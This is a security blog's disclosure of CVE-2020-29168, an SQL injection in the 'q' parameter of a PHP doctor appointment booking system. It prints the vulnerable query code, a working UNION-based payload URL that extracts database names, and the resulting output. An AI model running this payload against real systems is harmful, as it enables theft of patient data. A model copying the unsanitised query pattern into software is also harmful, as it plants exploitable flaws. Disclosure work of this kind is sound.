HomeAbout UsProducts
GEOINT - AI-Powered Geo Intelligence Platformpawnd — exploit development & memory triage
BlogOur Services
Automotive Security TestingIoT & Firmware TestingUAV & Drone SecurityWeb & Mobile Security
Trainings
Linux Usermode Exploitation 101
Contact
BLOG

CVE-2020-29168: Online Doctor Appointment Booking System PHP and Mysql 1.0 – ‘q’ SQL Injection

November 29, 2020 ·

Blog / Blog

An SQL injection vulnerability was discovered in PHP Doctor Appointment System by me on 11/16/2020.

In ‘getuser.php’ file, GET parameter ‘q’ is vulnerable.

The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.

Vulnerable code: 

include_once 'assets/conn/dbconnect.php';
$q = $_GET['q']; // Vulnerable param
// echo $q;
$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point

Used Payload:

http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23

Output: Extracted database: qbqvqdb_healthcareqvbxq

CVE-2023-36256
← Previous

Walkthrough: Legacy (HTB Retired Box)

 Next →

CVE-2023-36256: Online Examination System Project 1.0 – Cross-site request forgery (CSRF)

Access from the European Union/UK is restricted

This system is not offered to EU, UK, or EEA users.

This system is a non-EU research prototype and is not offered to individuals or entities within the European Union, United Kingdom, or European Economic Area. No services are provided to users in these jurisdictions, and no personal data from EU/UK/EEA data subjects is intended to be processed.